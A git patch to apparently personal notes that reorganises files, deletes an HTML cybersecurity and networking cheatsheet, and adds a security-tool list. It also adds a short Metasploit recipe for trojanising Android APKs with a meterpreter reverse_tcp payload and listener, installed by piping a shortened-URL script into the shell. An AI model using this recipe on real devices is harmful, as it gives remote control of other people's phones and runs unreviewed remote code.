From d0d1db63a2283d617e9042d93b365cf895ec9538 Mon Sep 17 00:00:00 2001 From: itspatkar <94187044+itspatkar@users.noreply.github.com> Date: Sat, 20 Jul 2024 09:56:05 +0000 Subject: [PATCH] Update --- {BAK => Assets}/ArchLinux.md | 0 {BAK => Assets}/arch_pkg.txt | 0 {BAK => Assets}/c.fish | 0 {BAK => Assets}/coding-conventions.txt | 0 {BAK => Assets}/cpp.fish | 0 Assets/cysec.txt | 8 + {BAK => Assets}/i3wm.md | 0 Assets/termux-metasploit-payload.txt | 23 +++ {BAK => Assets}/void_pkg.txt | 0 BAK/assets/script.js | 9 - BAK/assets/style.css | 139 ---------------- BAK/cysec.html | 221 ------------------------- 12 files changed, 31 insertions(+), 369 deletions(-) rename {BAK => Assets}/ArchLinux.md (100%) rename {BAK => Assets}/arch_pkg.txt (100%) rename {BAK => Assets}/c.fish (100%) rename {BAK => Assets}/coding-conventions.txt (100%) rename {BAK => Assets}/cpp.fish (100%) create mode 100644 Assets/cysec.txt rename {BAK => Assets}/i3wm.md (100%) create mode 100644 Assets/termux-metasploit-payload.txt rename {BAK => Assets}/void_pkg.txt (100%) delete mode 100644 BAK/assets/script.js delete mode 100644 BAK/assets/style.css delete mode 100644 BAK/cysec.html diff --git a/BAK/ArchLinux.md b/Assets/ArchLinux.md similarity index 100% rename from BAK/ArchLinux.md rename to Assets/ArchLinux.md diff --git a/BAK/arch_pkg.txt b/Assets/arch_pkg.txt similarity index 100% rename from BAK/arch_pkg.txt rename to Assets/arch_pkg.txt diff --git a/BAK/c.fish b/Assets/c.fish similarity index 100% rename from BAK/c.fish rename to Assets/c.fish diff --git a/BAK/coding-conventions.txt b/Assets/coding-conventions.txt similarity index 100% rename from BAK/coding-conventions.txt rename to Assets/coding-conventions.txt diff --git a/BAK/cpp.fish b/Assets/cpp.fish similarity index 100% rename from BAK/cpp.fish rename to Assets/cpp.fish diff --git a/Assets/cysec.txt b/Assets/cysec.txt new file mode 100644 index 0000000..73f0619 --- /dev/null +++ b/Assets/cysec.txt @@ -0,0 +1,8 @@ +# Cyber Security Tools + +- gobuster : Gobuster is a tool used in penetration testing and cybersecurity assessments. It's primarily designed for discovering web content, directories, and files on web servers. +- pdfinfo : Portable Document Format (PDF) document information extractor (poppler-utils) +- exiftool : ExifTool is used to read and write metadata in various file types, such as JPEG images. +- sqlmap : SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. +- crunch : Crunch command generates wordlists based on specified character sets, minimum and maximum lengths, and specific patterns. These wordlists can be used for dictionary attacks. +- jSQL : diff --git a/BAK/i3wm.md b/Assets/i3wm.md similarity index 100% rename from BAK/i3wm.md rename to Assets/i3wm.md diff --git a/Assets/termux-metasploit-payload.txt b/Assets/termux-metasploit-payload.txt new file mode 100644 index 0000000..ea6ec31 --- /dev/null +++ b/Assets/termux-metasploit-payload.txt @@ -0,0 +1,23 @@ +# MSFVenom Payload to exploit Android (LAN) + +# Install Metasploit Framework in Termux +source <(curl -fsSL https://kutt.it/msf) + +# Create MSFVenom Payload +msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R app_name.apk + +# Start Metasploit Console +msfconsole + +# Set Listener on Metasploit +use exploit/multi/handler + +# Set Reverse Payload +set payload android/meterpreter/reverse_tcp + +# Set localhost IP to receive and port to listen connections +set LHOST= +LPORT= + +# Start the listener +run / exploit diff --git a/BAK/void_pkg.txt b/Assets/void_pkg.txt similarity index 100% rename from BAK/void_pkg.txt rename to Assets/void_pkg.txt diff --git a/BAK/assets/script.js b/BAK/assets/script.js deleted file mode 100644 index 5182ed4..0000000 --- a/BAK/assets/script.js +++ /dev/null @@ -1,9 +0,0 @@ -var btn = document.querySelector(".button"); - -btn.addEventListener("click", function(){ - if (document.body.getAttribute("data-theme") == "light"){ - document.body.setAttribute("data-theme", "dark"); - } else { - document.body.setAttribute("data-theme", "light"); - } -}); diff --git a/BAK/assets/style.css b/BAK/assets/style.css deleted file mode 100644 index 6c5365b..0000000 --- a/BAK/assets/style.css +++ /dev/null @@ -1,139 +0,0 @@ -/* Theme Toggle */ -body[data-theme="light"] { - --bg-color: #fff; - --color: #000; - --link-color: #0d6efd; - --section-bg-color: #fbfbfc; - --section-border-color: #d7dce2; - --heading-underline-color: #ccc; - --code-box-bg-color: #f6f5f6; - --code-box-color: #e83e8c; - --code-box-color-ex: #ff395a; - --block-quote-bg-color: #e9ecef; - --block-quote-color: #212529; - --block-quote-border-color: #e9ecef; - --block-quote-border-left-color: #555a5e; - --bs-body-bg: #fff; - --bs-emphasis-color: #000; - --bs-border-color: #dee2e6; -} -body[data-theme="dark"] { - --bg-color: #080808; - --color: #fff; - --link-color: #1e88e5; - --section-bg-color: #0F1012; - --section-border-color: #ccc; - --heading-underline-color: #999; - --code-box-bg-color: #101010; - --code-box-color: #5fa8d3; - --code-box-color-ex: #42a5f5; - --block-quote-bg-color: #181818; - --block-quote-color: #999; - --block-quote-border-color: #5e5f60; - --block-quote-border-left-color: #caf0f8; - --bs-body-bg: #080808; - --bs-emphasis-color: #fff; - --bs-border-color: #606060; -} - -body { - background-color: var(--bg-color); - color: var(--color); -} -a { - text-decoration: none; - color: var(--link-color); -} -.sections ol, .sections ul { - padding-left: 1.25rem; -} -.button { - position: sticky; - top: 0.5rem; - padding-right: 0.5rem; - font-size: 1.5rem; -} -.title { - padding: 1rem; - text-align: center; -} -.section-list { - font-size: 1rem; -} -.sections { - margin-bottom: 0.75rem; - padding: 0.95rem; - background-color: var(--section-bg-color); - border: 1px solid var(--section-border-color); - border-radius: 10px; - font-size: 0.975rem; -} -.heading { - padding-bottom: 5px; - border-bottom: 1.5px solid var(--heading-underline-color); -} -p { - margin-bottom: 0.4rem; - text-align: justify; -} -thead { - text-align: center; -} -.code-box { - margin-bottom: 10px; - padding: 6px; - border: 1px solid #7c8e9c; - border-radius: 5px; - line-height: 1.35; - background-color: var(--code-box-bg-color); - color: var(--code-box-color); -} -code { - color: var(--code-box-color); -} -.table code { - white-space: nowrap; -} -.code-box-color { - color: var(--code-box-color-ex); -} -.block-quote { - margin-bottom: 8px; - padding: 4px; - padding-left: 8px; - border: 1px solid var(--block-quote-border-color); - border-left: 3px solid var(--block-quote-border-left-color); - word-spacing: 4px; - background-color: var(--block-quote-bg-color); - color: var(--block-quote-color); -} -.img { - max-height: 100%; - max-width: 100%; -} -.justify { - text-align: justify; -} -nav { - position: sticky; - bottom: 0.5rem; - padding: 0 0.5rem; - font-size: 1.5rem; -} -nav a { - color: var(--color); -} - -/* Responsiveness */ -@media screen and (max-width: 575px) { - .container { - padding: 5px; - } - .section-list { - font-size: 0.95rem; - } - .sections { - padding: 12px 8px; - font-size: 0.85rem; - } -} diff --git a/BAK/cysec.html b/BAK/cysec.html deleted file mode 100644 index c28ab8a..0000000 --- a/BAK/cysec.html +++ /dev/null @@ -1,221 +0,0 @@ - - - - - - - - Cyber Security Cheatsheet - - - - - - - - - - -
- -
- -

Cyber Security

- -
- -
- -
-

# Terminologies

-
-
    -
  • - Offensive Security (Red Team) :
    Attacking - Offensive security is the process of breaking into computer systems, exploiting vulnerabilities, and finding loopholes in applications to gain unauthorized access to them. -
  • -
  • - Defensive Security (Blue Team) :
    Defending/Preventing - Defensive security is the process of protecting an organization's network and computer systems by analyzing and securing any potential threats. -
  • -
  • - Security Operations Center (SOC) :
    The Security Operations Center (SOC) is a team of IT security professionals tasked with monitoring, preventing, detecting, investigating, and responding to threats within a company’s network and systems. -
  • -
  • - OSINT :
    Open-Source Intelligence (OSINT) is the act of gathering and analyzing publicly available data for intelligence purposes. -
  • -
  • - Threat Intelligence :
    Threat intelligence aims to gather information to help the company better prepare against potential adversaries. -
  • -
  • - OWASP :
    The Open Web Application Security Project is a nonprofit foundation focused on understanding web technologies and exploitations and provides resources and tools designed to improve the security of software applications.
  • -
  • - IDOR :
    Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. Broken access control means that an attacker can access information or perform actions not intended for them. -
  • -
  • - Firewall :
    A security system that monitors and controlls incoming an outgoing network traffic. -
  • -
  • - Virus :
    Virus is a piece of code (part of a program) that attaches itself to a program. It is designed to spread from one computer to another; moreover, it works by altering, overwriting, and deleting files once it infects a computer. The result ranges from the computer becoming slow to unusable. -
  • -
  • - Trojan Horse :Trojan Horse is a program that shows one desirable function but hides a malicious function underneath. For example, a victim might download a video player from a shady website that gives the attacker complete control over their system.
    -
  • -
  • - Ransomware :Ransomware is a malicious program that encrypts the user’s files. Encryption makes the files unreadable without knowing the encryption password. The attacker offers the user the encryption password if the user is willing to pay a “ransom.”
    -
  • -
  • - HTML Injection :HTML Injection is a vulnerability that occurs when unfiltered user input is displayed on the page. If a website fails to sanitise user input (filter any "malicious" text that a user inputs into a website), and that input is used on the page, an attacker can inject HTML code into a vulnerable website.
    -
  • -
  • - SQLi (Structured Query Language Injection) :SQLi is an attack on a web application database server that causes malicious queries to be executed. When a web application communicates with a database using input from a user that hasn't been properly validated, there runs the potential of an attacker being able to steal, delete or alter private and customer data and also attack the web application authentication methods to private or customer areas. - If web server of dbms throws sql error directly then it has sql injection vulnerability.
    -
  • -
  • - Proxy :Proxy server is a system or router that provides a gateway between users and the internet. Therefore, it helps prevent cyber attackers from entering a private network. It is a server, referred to as an “intermediary” because it goes between end-users and the web pages they visit online.
    -
  • -
  • - Web Socket :
    -
  • -
  • - SSL/TLS :
    Establishes a secure connection over public network, enabling secure remove access. -
  • -
  • - VPN :
    -
  • -
  • - TOR (The Onion Router) :
    TOR Network and Browser. -
  • -
  • - Proxychains :
    -
  • -
-
-
- -
-

# Tools

-
-
    -
  • - gobuster : Gobuster is a tool used in penetration testing and cybersecurity assessments. It's primarily designed for discovering web content, directories, and files on web servers. -
  • -
  • - pdfinfo : Portable Document Format (PDF) document information extractor (poppler-utils) -
  • -
  • - exiftool : ExifTool is used to read and write metadata in various file types, such as JPEG images. -
  • -
  • - sqlmap : SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. -
  • -
  • - crunch : Crunch command generates wordlists based on specified character sets, minimum and maximum lengths, and specific patterns. These wordlists can be used for dictionary attacks. -
  • -
  • - jSQL : -
  • -
  • - Burp Suite : Burp Suite is a Java-based framework designed to serve as a comprehensive solution for conducting web application penetration testing. Burp Suite captures and enables manipulation of all the HTTP/HTTPS traffic between a browser and a web server. This fundamental capability forms the backbone of the framework. The ability to intercept, view, and modify web requests before they reach the target server or even manipulate responses before they are received by our browser makes Burp Suite an invaluable tool for manual web application testing. It includes various tools for scanning, fuzzing, intercepting, and analyzing web traffic. -
  • -
-
-
- - - -
- - - - - - - -Ethernet - -A family of protocols that specify how devices on the same network segment format and transmit data. - -A standard way to connect devices in a wired network using cables and hubs. - -Ethernet - -A family of protocols that specify how devices on the same network segment format and transmit data. - -https://www.codelivly.com/the-ultimate-networking-cheatsheet/ - ------------------------------ - -SSL/TLS - - ----------------------- - -Firewall - -Firewall Type Description -Network Firewall Protects an entire network from unauthorized access and attacks -Host-based Firewall Protects an individual computer from unauthorized access and attacks - -Firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. - -Network Firewall is a firewall that protects an entire network from unauthorized access and attacks. Network firewalls can be hardware or software-based and are typically installed at the perimeter of a network to block unauthorized access from the internet. - -Host-based Firewall is a firewall that protects an individual computer from unauthorized access and attacks. Host-based firewalls are typically software-based and are installed on individual computers to control access to network resources and block unauthorized traffic. - -Firewalls use a variety of techniques to control and monitor network traffic, including packet filtering, stateful inspection, and application-level filtering. By blocking unauthorized access and filtering out malicious traffic, firewalls help to protect networks and the data transmitted over them from security threats. - ------------------------- - -VPN -VPN Type Description -Site-to-Site VPN Connects two or more networks together over the internet -Remote Access VPN Allows remote users to securely access a private network over the internet - -VPN, or Virtual Private Network, is a technique used to create a secure and encrypted connection over the internet between two or more devices or networks. - -Site-to-Site VPN connects two or more networks together over the internet, allowing devices on each network to communicate securely with devices on the other network(s). This is commonly used by businesses with multiple locations or by organizations that need to securely connect with partner networks. - -Remote Access VPN allows remote users to securely access a private network over the internet. This is commonly used by employees who need to access company resources from a remote location, such as from home or while traveling. Remote access VPN can be configured to require user authentication and can be set up to provide access to specific network resources. - -VPNs use encryption and tunneling protocols to ensure that data transmitted over the internet is secure and protected from unauthorized access. VPNs are commonly used in businesses and organizations to improve network security and enable remote access to network resources. - - ----------------- - -NAT -NAT Type Description -Static NAT Maps a public IP address to a single private IP address -Dynamic NAT Maps a public IP address to a pool of private IP addresses -PAT (Port Address Translation) Maps a public IP address and port to a private IP address and port - -NAT, or Network Address Translation, is a technique used to allow multiple devices on a private network to share a single public IP address. - -Static NAT maps a single public IP address to a specific private IP address, while dynamic NAT maps a public IP address to a pool of private IP addresses. This allows multiple devices on a private network to share a single public IP address, as each device is assigned a unique private IP address from the pool. - -PAT, or Port Address Translation, is a form of NAT that maps a public IP address and port to a private IP address and port. This allows multiple devices on a private network to share a single public IP address, with each device being assigned a unique port number. - -NAT is commonly used in small to medium-sized networks to allow devices on a private network to access the internet using a single public IP address. - - ----------------- - -DNS -Record Type Description -A Maps a hostname to an IPv4 address -AAAA Maps a hostname to an IPv6 address -CNAME Maps an alias hostname to the canonical hostname -MX Specifies the mail exchange server(s) for a domain -TXT Stores arbitrary text data associated with a hostname -NS Specifies the name server(s) for a domain - -DNS, or Domain Name System, is a hierarchical naming system used to translate human-readable domain names into IP addresses that machines can understand. - -DNS uses various types of resource records, or DNS records, to store information about domain names and their associated IP addresses. The A record maps a hostname to an IPv4 address, while the AAAA record maps a hostname to an IPv6 address. The CNAME record maps an alias hostname to the canonical hostname. - -The MX record specifies the mail exchange server(s) for a domain, while the TXT record stores arbitrary text data associated with a hostname. The NS record specifies the name server(s) for a domain. - -DNS is a critical component of the internet infrastructure, and it is used for a wide range of applications, including web browsing, email, and online gaming.